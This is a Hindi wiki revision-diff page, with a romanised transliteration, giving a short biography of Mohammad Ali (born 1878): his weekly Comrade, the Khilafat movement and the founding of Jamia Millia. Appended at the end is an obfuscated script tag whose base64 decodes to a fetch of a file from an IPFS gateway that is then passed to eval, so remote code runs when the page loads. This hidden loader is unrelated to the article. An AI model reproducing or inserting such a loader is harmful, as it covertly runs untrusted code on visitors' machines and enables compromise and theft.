Difference between revisions of "मोहम्मद अली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
'''मोहम्मद अली''' सन [[1878]] में जन्मे प्रमुख शिक्षाविद् व स्वाधीनता सेनानी, जो [[रायपुर]] रियासत के शिक्षाधिकारी थे।
 
'''मोहम्मद अली''' सन [[1878]] में जन्मे प्रमुख शिक्षाविद् व स्वाधीनता सेनानी, जो [[रायपुर]] रियासत के शिक्षाधिकारी थे।
 
+
*मोहम्मद अली ने सन [[1911]] में 'कामरेड' नामक साप्ताहिक पत्र निकाला था।  
*मोहम्मद अली ने सन [[1911]] में 'कामरेड' नामक साप्ताहिक पत्र निकाला था। [[1914]] में इस पत्र पर प्रतिबन्ध लगा दिया गया तथा उन्हें चार साल की सज़ा दी गई।  
+
*[[1914]] में इस पत्र पर प्रतिबन्ध लगा दिया गया तथा उन्हें चार साल की सज़ा दी गई।  
 
*उन्होंने [[खिलाफत आन्दोलन]] में भाग लिया तथा [[अलीगढ़]] में 'जामिया मिलिया विश्वविद्यालय' की स्थापना की, जो बाद में [[दिल्ली]] लाया गया।  
 
*उन्होंने [[खिलाफत आन्दोलन]] में भाग लिया तथा [[अलीगढ़]] में 'जामिया मिलिया विश्वविद्यालय' की स्थापना की, जो बाद में [[दिल्ली]] लाया गया।  
 
*मोहम्मद अली का निधन सन [[1930]] में हुआ था।
 
*मोहम्मद अली का निधन सन [[1930]] में हुआ था।

Revision as of 07:59, 30 June 2012

mohammad ali san 1878 mean janme pramukh shikshavidh v svadhinata senani, jo rayapur riyasat ke shikshadhikari the.

  • mohammad ali ne san 1911 mean 'kamared' namak saptahik patr nikala tha.
  • 1914 mean is patr par pratibandh laga diya gaya tatha unhean char sal ki saza di gee.
  • unhoanne khilaphat andolan mean bhag liya tatha aligadh mean 'jamiya miliya vishvavidyalay' ki sthapana ki, jo bad mean dilli laya gaya.
  • mohammad ali ka nidhan san 1930 mean hua tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>